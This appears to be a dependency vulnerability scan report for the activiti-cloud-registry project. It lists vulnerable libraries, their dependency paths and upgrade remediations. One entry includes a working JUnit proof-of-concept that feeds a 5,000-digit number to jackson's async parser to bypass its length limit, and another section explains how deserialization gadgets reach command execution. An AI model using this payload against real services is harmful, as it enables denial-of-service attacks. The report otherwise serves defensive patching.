Vulnerabilities

 63 via 1035 paths

Dependencies

 185

Source

 GitHub

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 2
  • 29
  • 26
  • 6
Status
  • 63
  • 0
  • 0

critical severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. If the security framework has not been initialized, it may allow a remote attacker to run arbitrary shell commands when unmarshalling XML or any supported format.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.11 or higher.

References

Deserialization of Untrusted Data vulnerability report

critical severity
new

Improper Authentication

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 org.apache.tomcat.embed:tomcat-embed-core@11.0.21
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 org.apache.tomcat.embed:tomcat-embed-core@11.0.21

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Authentication when DIGEST authentication is configured. An attacker can gain unauthorized access by providing any unknown username, as the system will incorrectly authenticate the user.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.

References

Improper Authentication vulnerability report

high severity

Uncontrolled Recursion

  • Vulnerable module: commons-lang:commons-lang
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 commons-configuration:commons-configuration@1.8 commons-lang:commons-lang@2.6
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 commons-configuration:commons-configuration@1.8 commons-lang:commons-lang@2.6
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 commons-configuration:commons-configuration@1.8 commons-lang:commons-lang@2.6
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 commons-configuration:commons-configuration@1.8 commons-lang:commons-lang@2.6

Overview

Affected versions of this package are vulnerable to Uncontrolled Recursion via the ClassUtils.getClass function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.

Remediation

There is no fixed version for commons-lang:commons-lang.

References

Uncontrolled Recursion vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.20.2, com.fasterxml.jackson.core:jackson-databind@2.20.2 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry com.fasterxml.jackson.core:jackson-core@2.20.2
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.21.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.21.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.2 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 org.springframework.boot:spring-boot-jackson2@4.0.2 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.2 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:jmespath-java@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:jmespath-java@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:jmespath-java@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:jmespath-java@1.11.277 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-autoscaling@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-ec2@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-route53@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.amazonaws:aws-java-sdk-sts@1.11.277 com.amazonaws:aws-java-sdk-core@1.11.277 com.fasterxml.jackson.dataformat:jackson-dataformat-cbor@2.6.7 com.fasterxml.jackson.core:jackson-core@2.20.2

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.

PoC

The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.

package tools.jackson.core.unittest.dos;

import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.Test;

import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;

import static org.junit.jupiter.api.Assertions.*;

/**
 * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
 *
 * Authors: sprabhav7, rohan-repos
 * 
 * maxNumberLength default = 1000 characters (digits).
 * A number with more than 1000 digits should be rejected by any parser.
 *
 * BUG: The async parser never calls resetInt()/resetFloat() which is where
 * validateIntegerLength()/validateFPLength() lives. Instead it calls
 * _valueComplete() which skips all number length validation.
 *
 * CWE-770: Allocation of Resources Without Limits or Throttling
 */
class AsyncParserNumberLengthBypassTest {

    private static final int MAX_NUMBER_LENGTH = 1000;
    private static final int TEST_NUMBER_LENGTH = 5000;

    private final JsonFactory factory = new JsonFactory();

    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
    @Test
    void syncParserRejectsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
        
        // Output to console
        System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
        try {
            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
                while (p.nextToken() != null) {
                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                        System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
                    }
                }
            }
            fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
        } catch (StreamConstraintsException e) {
            System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
        }
    }

    // VULNERABILITY: Async parser accepts the SAME number that sync rejects
    @Test
    void asyncParserAcceptsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);

        NonBlockingByteArrayJsonParser p =
            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
        p.feedInput(payload, 0, payload.length);
        p.endOfInput();

        boolean foundNumber = false;
        try {
            while (p.nextToken() != null) {
                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                    foundNumber = true;
                    String numberText = p.getText();
                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
                        "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
                }
            }
            // Output to console
            System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
            assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
        } catch (StreamConstraintsException e) {
            fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
        }
        p.close();
    }

    private byte[] buildPayloadWithLongInteger(int numDigits) {
        StringBuilder sb = new StringBuilder(numDigits + 10);
        sb.append("{\"v\":");
        for (int i = 0; i < numDigits; i++) {
            sb.append((char) ('1' + (i % 9)));
        }
        sb.append('}');
        return sb.toString().getBytes(StandardCharsets.UTF_8);
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.6, 2.21.1 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.20.2, com.fasterxml.jackson.core:jackson-databind@2.20.2 and others

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry com.fasterxml.jackson.core:jackson-core@2.20.2
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.21.2.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.21.2.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.2 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-core@2.20.2
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.fasterxml.jackson.core:jackson-databind@2.20.2 com.fasterxml.jackson.core:jackson-core@2.20.2
